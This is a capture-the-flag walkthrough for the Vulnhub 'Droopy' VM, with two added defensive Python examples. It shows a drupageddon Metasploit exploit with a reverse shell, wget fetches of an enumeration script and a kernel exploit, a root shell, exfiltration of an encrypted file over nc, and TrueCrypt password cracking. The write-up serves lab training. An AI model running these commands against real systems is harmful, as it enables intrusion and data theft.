Bringing Droopy To Life

Hi there!!!
It was time to deal with the Droopy VM hosted on Vulnhub. It was interesting in many ways and taught me some important things. Here are the steps I took to get root on the VM. My attacker Kali box was set to 192.168.56.102.

Once the VM is up, run an nmap scan on the subnet you placed the VM in to identify its IP address.

root@kali:~# nmap -n -Pn -v 192.168.56.0/24

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-22 12:16 EDT
Initiating ARP Ping Scan at 12:16
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 12:16, 1.97s elapsed (255 total hosts)
Initiating SYN Stealth Scan at 12:16
Scanning 3 hosts [1000 ports/host]
Discovered open port 80/tcp on 192.168.56.104
Completed SYN Stealth Scan against 192.168.56.104 in 0.19s (2 hosts left)
Completed SYN Stealth Scan against 192.168.56.100 in 7.04s (1 host left)
Completed SYN Stealth Scan at 12:16, 7.14s elapsed (3000 total ports)
Nmap scan report for 192.168.56.104
Host is up, received arp-response (0.00047s latency).
Not shown: 999 closed ports
Reason: 999 resets
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:07:EC:AC (Oracle VirtualBox virtual NIC)

Initiating SYN Stealth Scan at 12:16
Scanning 192.168.56.102 [1000 ports]
Completed SYN Stealth Scan at 12:16, 0.06s elapsed (1000 total ports)
Read data files from: /usr/bin/../share/nmap
Nmap done: 256 IP addresses (3 hosts up) scanned in 9.51 seconds
           Raw packets sent: 6509 (278.268KB) | Rcvd: 3019 (124.776KB)
root@kali:~#

So, we now have our target's IP address and we see port 80 open on the target. Browsing the site on port 80 reveals what looks like a Drupal site.

[Screenshot 1: the site on port 80]

Reading through the view-source of the page reveals a modules directory.

<head profile="http://www.w3.org/1999/xhtml/vocab">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="http://192.168.56.104/misc/favicon.ico" type="image/vnd.microsoft.icon" />
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
  <title>Welcome to La fraude fiscale des grandes sociétés | La fraude fiscale des grandes sociétés</title>
  <style type="text/css" media="all">@import url("http://192.168.56.104/modules/system/system.base.css?ngf65y");
@import url("http://192.168.56.104/modules/system/system.menus.css?ngf65y");
@import url("http://192.168.56.104/modules/system/system.messages.css?ngf65y");
@import url("http://192.168.56.104/modules/system/system.theme.css?ngf65y");</style>
<style type="text/css" media="all">@import url("http://192.168.56.104/modules/comment/comment.css?ngf65y");

Browsing through the modules directory and then into the blog directory shows some interesting files.

[Screenshot 2: directory listing of modules/blog]

The blog.info file, whose contents are shown below, reveals the Drupal version and the update date.

name = Blog
description = Enables multi-user blogs.
package = Core
version = VERSION
core = 7.x
files[] = blog.test

; Information added by Drupal.org packaging script on 2014-07-24
version = "7.30"
project = "drupal"
datestamp = "1406239730"

With this information we now search for exploits related to this version of Drupal. The search shows four SQLi vulnerabilities.

root@kali:~# searchsploit drupal 7.3
------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                    |  Path
                                                                                                                | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------------------------------ ----------------------------------
Drupal 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (1)                                                         | ./php/webapps/34984.py
Drupal 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (2)                                                         | ./php/webapps/34992.txt
Drupal 7.32 - SQL Injection (PHP)                                                                                 | ./php/webapps/34993.php
Drupal < 7.32 - Unauthenticated SQL Injection                                                                     | ./php/webapps/35150.php
Drupal < 7.34 - Denial of Service                                                                                 | ./php/dos/35415.txt
------------------------------------------------------------------------------------------------------------------ ----------------------------------
root@kali:~#
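The two steps above (reading the packaged version out of a module's .info file, then checking it against the affected range that searchsploit lists) can be automated for a defender's own asset inventory. The following is an added example, not code from the original post or from the Drupal project: it parses the INI-like .info format shown above (plain `key = value` lines, `;` comments, quoted values, and `key[] = value` list entries) and flags a packaged Drupal 7 core release at or below 7.31, which is the range "Drupal 7.0 <= 7.31" given in the searchsploit output for SA-CORE-2014-005. The sample input is the blog.info text from this page; the function names are my own.

```python
"""Parse a Drupal .info file and check the packaged core version against
the SA-CORE-2014-005 affected range (7.0 through 7.31).  Added example,
not part of the original post or of Drupal itself."""
import re
from typing import Dict, List, Optional, Tuple, Union

# Sample input: the blog.info contents shown on the page.
SAMPLE_INFO = """name = Blog
description = Enables multi-user blogs.
package = Core
version = VERSION
core = 7.x
files[] = blog.test

; Information added by Drupal.org packaging script on 2014-07-24
version = "7.30"
project = "drupal"
datestamp = "1406239730"
"""

InfoValue = Union[str, List[str]]
VERSION_RE = re.compile(r"^(\d+)\.(\d+)$")


def parse_info(text: str) -> Dict[str, InfoValue]:
    """Parse the .info format: 'key = value', ';' comments, optional double
    quotes around values, and 'key[] = value' for list entries.  A later
    scalar assignment overrides an earlier one, which is exactly how the
    packaging script's version = "7.30" replaces the VERSION placeholder."""
    info: Dict[str, InfoValue] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        if key.endswith("[]"):
            bucket = info.setdefault(key[:-2], [])
            if isinstance(bucket, list):
                bucket.append(value)
        else:
            info[key] = value
    return info


def packaged_version(info: Dict[str, InfoValue]) -> Optional[Tuple[int, int]]:
    """Return (major, minor) from the version key, or None when only the
    unexpanded VERSION placeholder is present (a git checkout rather than a
    packaged release, so no release number can be inferred from this file)."""
    value = info.get("version")
    if not isinstance(value, str):
        return None
    match = VERSION_RE.match(value)
    if not match:
        return None
    return int(match.group(1)), int(match.group(2))


def affected_by_sa_core_2014_005(version: Optional[Tuple[int, int]]) -> bool:
    """Drupal 7.0 <= x <= 7.31 is the range listed by searchsploit; 7.32 is fixed."""
    if version is None:
        return False
    major, minor = version
    return major == 7 and minor <= 31


if __name__ == "__main__":
    parsed = parse_info(SAMPLE_INFO)
    ver = packaged_version(parsed)
    print("module:", parsed["name"], "files:", parsed["files"])
    print("packaged core version:", ver, "affected:", affected_by_sa_core_2014_005(ver))
```

Any core module's .info file (system.info, blog.info, etc.) carries the same packaging block, so the same check works wherever one of them is readable; a version of None means the file was a development checkout and the release has to be determined another way.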

I went on to start Metasploit and search for Drupal exploits. It reveals the drupageddon exploit, which perfectly matches our needs.

msf > search drupal
[!] Module database cache not built yet, using slow search

Matching Modules
================
   Name                                           Disclosure Date  Rank       Description
   ----                                           ---------------  ----       -----------
   auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Drupal OpenID External Entity Injection
   auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Drupal Views Module Users Enumeration
   exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
   exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Drupal CODER Module Remote Command Execution
   exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Drupal RESTWS Module Remote PHP Code Execution
   exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution

msf >

Let's load the exploit and fire it at our target. We see that we get a meterpreter shell on port 443 as my payload was meterpreter/reverse_https.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > set rhost 192.168.56.104
rhost => 192.168.56.104
msf exploit(drupal_drupageddon) > exploit

[*] [2016.10.23-01:49:27] Started reverse TCP handler on 192.168.56.102:443
[*] [2016.10.23-01:49:27] Testing page
[*] [2016.10.23-01:49:27] form_build_id: form-ssrGRu8SjQkDej4iMqKw1BWsjj80H-mRseruHJtmCAo
[*] [2016.10.23-01:49:27] form_token:
[*] [2016.10.23-01:49:27] password hash: $P\$8mXsPjjln6.vJI2.WUt/WaM5H7N0HC.
[*] [2016.10.23-01:49:27] Creating new user ZSXdhIILHk:JWVLiTuClN
[*] [2016.10.23-01:49:27] Logging in as ZSXdhIILHk:JWVLiTuClN
[*] [2016.10.23-01:49:27] cookie: SESS3eb28b0d019dcab2f9875b3202ac4a41=5ScHJZVRyRsyUICX-0wJvYLeV12HUwUD3YZ0Y59Cyj4;
[*] [2016.10.23-01:49:27] Trying to parse enabled modules
[*] [2016.10.23-01:49:28] form_build_id: form-eXbf0AjAoBl3w2xFBKqVBCt9G0nBPEHQw7DHYieB40U
[*] [2016.10.23-01:49:28] form_token: lmmJjwxJH5Yp6tsBVpQsTJ_NUYWyY8IlVxX1UAtfcrQ
[*] [2016.10.23-01:49:28] Enabling the PHP filter module
[*] [2016.10.23-01:49:30] Setting permissions for PHP filter module
[*] [2016.10.23-01:49:31] form_build_id: form-PDYNDiAC2NeE_Zg1uMNNM65C3E3wzlqsjSPFs0Yv3oA
[*] [2016.10.23-01:49:31] form_token: zV_dO-5bMCK-iakZRyIq6fVvO4sJnkZwFkcKefTJ0VU
[*] [2016.10.23-01:49:31] admin role id: 3
[*] [2016.10.23-01:49:31] Getting tokens from create new article page
[*] [2016.10.23-01:49:31] form_build_id: form-mDiJpvdoortY-e1GqzeFNvmpwJu9Co5MAs7AaKlJYy8
[*] [2016.10.23-01:49:31] form_token: QU7edfdjd6FOJo-CrYhw-skiIELvkMflDgS0r9RznDE
[*] [2016.10.23-01:49:31] Calling preview page. Exploit should trigger...
[*] [2016.10.23-01:49:31] Encoded stage with php/base64
[*] [2016.10.23-01:49:31] Sending encoded stage (45098 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:443 -> 192.168.56.104:59355) at 2016-10-23 01:49:33 -0400
[-] The 'stdapi' extension has already been loaded.

meterpreter >

We now execute the shell command to get a remote shell and make it interactive using a Python one-liner.

meterpreter > shell
Process 1176 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@droopy:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@droopy:/var/www/html$

Now it was time for some enumeration to escalate our privileges to root. Searching the usual locations for clues, we find that we can read a mail for the www-data user.

www-data@droopy:/var/www/html$ cat /var/mail/www-data
cat /var/mail/www-data
From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave
www-data@droopy:/var/www/html$

Interesting!! It reveals the existence of an encrypted file which we will need to decrypt to proceed further. Having this info, I set out to search for this file but did not find anything interesting after some frustrating hours of searching. I tried searching for strings containing the following words to try and locate the file: Dave, George, password etc. I also searched for recently updated files and for files edited on 14 Apr 2016, as the mail was sent on that date.

I finally gave up on this course and started some more enumeration using a Python script. I usually use this script to automate some of the enumeration process and save time.
After downloading the script to my system and then on to the target, I ran it.

www-data@droopy:/var/www/html$ cd /tmp/
cd /tmp/
www-data@droopy:/tmp$ wget http://192.168.56.102:8000/lpe.py
wget http://192.168.56.102:8000/lpe.py
--2016-10-23 12:38:39--  http://192.168.56.102:8000/lpe.py
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K) [text/plain]
Saving to: 'lpe.py'

100%[======================================>] 25,304      --.-K/s   in 0.03s  

2016-10-23 12:38:39 (721 KB/s) - 'lpe.py' saved [25304/25304]

www-data@droopy:/tmp$ python lpe.py > lpe.txt
python lpe.py > lpe.txt
www-data@droopy:/tmp$

It did not reveal anything interesting other than an older kernel version, which you can get using the command below.

www-data@droopy:/tmp$ uname -a
uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@droopy:/tmp$

I started googling for an exploit for this kernel and downloaded the 64-bit exploit from this location. I compiled the exploit on my Kali VM, downloaded it to the target machine and ran it, only to see it fail :(.

www-data@droopy:/tmp$ wget http://192.168.56.102:8000/ofc_64
wget http://192.168.56.102:8000/ofc_64
--2016-10-23 12:47:07--  http://192.168.56.102:8000/ofc_64
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12036 (12K) [application/octet-stream]
Saving to: 'ofc_64'

100%[======================================>] 12,036      --.-K/s   in 0s     

2016-10-23 12:47:07 (48.9 MB/s) - 'ofc_64' saved [12036/12036]

www-data@droopy:/tmp$ chmod +x ofc_64
chmod +x ofc_64
www-data@droopy:/tmp$ ls -l
ls -l
total 116
-rw-r--r-- 1 www-data www-data 25304 Oct 16 11:20 lpe.py
-rw-r--r-- 1 www-data www-data 75868 Oct 23 12:39 lpe.txt
-rwxr-xr-x 1 www-data www-data 12036 Oct 16 10:33 ofc_64
www-data@droopy:/tmp$ ./ofc_64
./ofc_64
bash: ./ofc_64: No such file or directory
www-data@droopy:/tmp$

At this point I had no idea what I should do next. After some breaks and some thinking I realized the mistake I had made. I had compiled the program on the Kali VM instead of on the target, which may have been the reason for its failure. So, I went back, downloaded the source onto the target, compiled it there and ran it, and finally I had the root shell :).

www-data@droopy:/tmp$ wget http://192.168.56.102:8000/ofc_64.c
wget http://192.168.56.102:8000/ofc_64.c
--2016-10-23 12:51:43--  http://192.168.56.102:8000/ofc_64.c
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: 'ofc_64.c'

100%[======================================>] 5,123       --.-K/s   in 0.07s  

2016-10-23 12:51:43 (74.8 KB/s) - 'ofc_64.c' saved [5123/5123]

www-data@droopy:/tmp$ gcc ofc_64.c -o ofc_64
gcc ofc_64.c -o ofc_64
www-data@droopy:/tmp$ ls -l
ls -l
total 128
-rw-r--r-- 1 www-data www-data 25304 Oct 16 11:20 lpe.py
-rw-r--r-- 1 www-data www-data 75868 Oct 23 12:39 lpe.txt
-rwxr-xr-x 1 www-data www-data 13685 Oct 23 12:52 ofc_64
-rw-r--r-- 1 www-data www-data  5123 Oct 16 10:33 ofc_64.c
www-data@droopy:/tmp$ ./ofc_64
./ofc_64
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
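The exploit output above reports "/etc/ld.so.preload created" before the root shell appears. On a stock system that file normally does not exist at all, and a library listed there is injected into every dynamically linked process, so its presence, or an entry pointing outside the system library directories or into a world-writable location, is a strong indicator for a defender doing incident response on a box like this. The following audit is an added example, not code from the original post: it parses ld.so.preload entries (whitespace- or colon-separated paths; lines are also stripped at `#`, which this parser treats as a comment marker) and reports entries that are outside /lib, /lib64, /usr/lib or /usr/lib64, are missing, are not root-owned, or are group/world writable. The sample file contents and the fake filesystem are constructed so the code runs offline; the real-system helper at the end uses os.stat on the live file.

```python
"""Audit /etc/ld.so.preload for suspicious entries.  Added example, not
part of the original post.  Sample data below is constructed."""
import os
import re
import stat
from dataclasses import dataclass
from typing import Callable, List

TRUSTED_PREFIXES = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

# Constructed sample: one entry in /tmp, one benign library, one missing library.
SAMPLE_PRELOAD = (
    "# constructed example file\n"
    "/tmp/example_preload.so\n"
    "/usr/lib/libbenign.so:/usr/lib/libgone.so\n"
)

# Constructed fake filesystem: path -> os.stat_result
# (st_mode, st_ino, st_dev, st_nlink, st_uid, st_gid, st_size, atime, mtime, ctime)
FAKE_FS = {
    "/tmp/example_preload.so": os.stat_result((0o100666, 0, 0, 1, 33, 33, 0, 0, 0, 0)),
    "/usr/lib/libbenign.so": os.stat_result((0o100644, 0, 0, 1, 0, 0, 0, 0, 0, 0)),
}


def fake_stat(path: str) -> os.stat_result:
    """stat() replacement backed by FAKE_FS so the audit can run offline."""
    try:
        return FAKE_FS[path]
    except KeyError:
        raise FileNotFoundError(path)


@dataclass(frozen=True)
class Finding:
    path: str
    reason: str


def parse_preload(text: str) -> List[str]:
    """Split file contents into library paths: entries are separated by
    whitespace or ':'; anything after '#' on a line is dropped as a comment."""
    entries: List[str] = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        entries.extend(tok for tok in re.split(r"[\s:]+", line) if tok)
    return entries


def audit_preload(text: str, stat_fn: Callable[[str], os.stat_result] = os.stat) -> List[Finding]:
    """Return one Finding per suspicious property of each preload entry."""
    findings: List[Finding] = []
    for path in parse_preload(text):
        if not path.startswith(TRUSTED_PREFIXES):
            findings.append(Finding(path, "outside system library directories"))
        try:
            st = stat_fn(path)
        except OSError:
            # A missing preload library breaks every process start; also a
            # common leftover after an injected library has been cleaned up.
            findings.append(Finding(path, "missing"))
            continue
        if st.st_uid != 0:
            findings.append(Finding(path, "not owned by root"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(Finding(path, "group or world writable"))
    return findings


def audit_live_system(preload_path: str = "/etc/ld.so.preload") -> List[Finding]:
    """Audit the real file.  Its mere existence is reported, since a clean
    install normally has no such file."""
    if not os.path.exists(preload_path):
        return []
    with open(preload_path, encoding="utf-8", errors="replace") as fh:
        return [Finding(preload_path, "present")] + audit_preload(fh.read())


if __name__ == "__main__":
    for f in audit_preload(SAMPLE_PRELOAD, fake_stat):
        print(f"{f.path}: {f.reason}")
    for f in audit_live_system():
        print(f"LIVE {f.path}: {f.reason}")
```

The check is deliberately conservative: an entry under /usr/lib that is root-owned and not writable produces no finding, so the output on a healthy host is empty, while the kind of entry left behind by the exploit run shown above produces several.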

Now it was time to get the flag as usual, but there is no flag in the root directory. Instead we have a file which appears to be the one mentioned in the mail.

# ls -l /root/
ls -l /root/
total 5124
-rw-r--r-- 1 root root 5242880 Apr 12  2016 dave.tc
#

I copied the file over to my kali VM using nc.

# /bin/nc 192.168.56.102 4444 < /root/dave.tc
/bin/nc 192.168.56.102 4444 < /root/dave.tc
#

root@kali:~/research/droopy# nc -lvp 4444 > dave.tc
listening on [any] 4444 ...
192.168.56.104: inverse host lookup failed: Unknown host
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.104] 58414
root@kali:~/research/droopy# ls -l
total 5264
---[redacted]---
-rw-r--r-- 1 root root 5242880 Oct 23 02:30 dave.tc
---[redacted]---
-rw-r--r-- 1 root root     656 Oct 16 13:46 mail
root@kali:~/research/droopy#

It was time to crack the TrueCrypt encrypted file. The password probably has the word 'academy' in it, so let's grep rockyou.txt for the word academy to prepare a wordlist, and use it to crack the file.

root@kali:~/research/droopy# grep -i 'academy' /usr/share/wordlists/rockyou.txt > academy.txt

Initially I thought truecrack would automatically detect the key derivation function. So I let it run with the default, ripemd160, but it came back empty. I used the command below.

truecrack -t dave.tc -w academy.txt

Next I tried to mutate the academy wordlist with john by specifying all the rules, but that did not help either. Below is the command I used to mutate the wordlist.

john --wordlist=academy.txt --rules --stdout >> acad.mutated

Having failed with this as well, I turned to changing the key derivation function to sha512, which worked.

root@kali:~/droopy# truecrack -k sha512 -t dave.tc -w academy.txt
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
Found password:                       "etonacademy"
Password length:            "12"
Total computations:       "120"

Having found the password, it was time to open the dave.tc file, which was done with the command below.

root@kali:~/research/droopy# cryptsetup --type tcrypt open dave.tc dave
Enter passphrase:
root@kali:~/research/droopy#

This will then show up as a drive in the file manager. After you access the drive it will appear in the /media folder as shown below.

root@kali:~/research/droopy# ls -laR /media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/
/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/:
total 20
drwxr-xr-x  6 root root  1024 Apr 12  2016 .
drwxr-x---+ 3 root root  4096 Oct 25 09:04 ..
drwxr-xr-x  2 root root  1024 Apr 12  2016 buller
drwx------  2 root root 12288 Apr 12  2016 lost+found
drwxr-xr-x  2 root root  1024 Apr 12  2016 panama
drwxr-xr-x  3 root root  1024 Apr 12  2016 .secret

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/buller:
total 11
drwxr-xr-x 2 root root 1024 Apr 12  2016 .
drwxr-xr-x 6 root root 1024 Apr 12  2016 ..
-rw-r--r-- 1 root root 8393 Oct  4  2013 BullingdonCrest.jpg

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/lost+found:
total 13
drwx------ 2 root root 12288 Apr 12  2016 .
drwxr-xr-x 6 root root  1024 Apr 12  2016 ..

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/panama:
total 52
drwxr-xr-x 2 root root  1024 Apr 12  2016 .
drwxr-xr-x 6 root root  1024 Apr 12  2016 ..
-rw-r--r-- 1 root root 49257 Jun 15  2014 shares.jpg

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/.secret:
total 64
drwxr-xr-x 3 root root  1024 Apr 12  2016 .
drwxr-xr-x 6 root root  1024 Apr 12  2016 ..
-rw-r--r-- 1 root root 61118 Feb 25  2016 piers.png
drwxr-xr-x 2 root root  1024 Apr 12  2016 .top

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/.secret/.top:
total 3
drwxr-xr-x 2 root root 1024 Apr 12  2016 .
drwxr-xr-x 3 root root 1024 Apr 12  2016 ..
-r-------- 1 root root  872 Apr 12  2016 flag.txt
root@kali:~/research/droopy#

It has some cool images which you should check out, and the flag 🙂

root@kali:~/research/droopy# cat /media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/.secret/.top/flag.txt

##########################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################


Firstly, thanks for trying this VM. If you have rooted it, well done!


Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare
root@kali:~/research/droopy#

Takeaways:

  • Persistence, never give up.
  • Pay attention to even the smallest details; if something fails, try its variants before moving on.

Finally thanks knightmare and Vulnhub for this VM!!
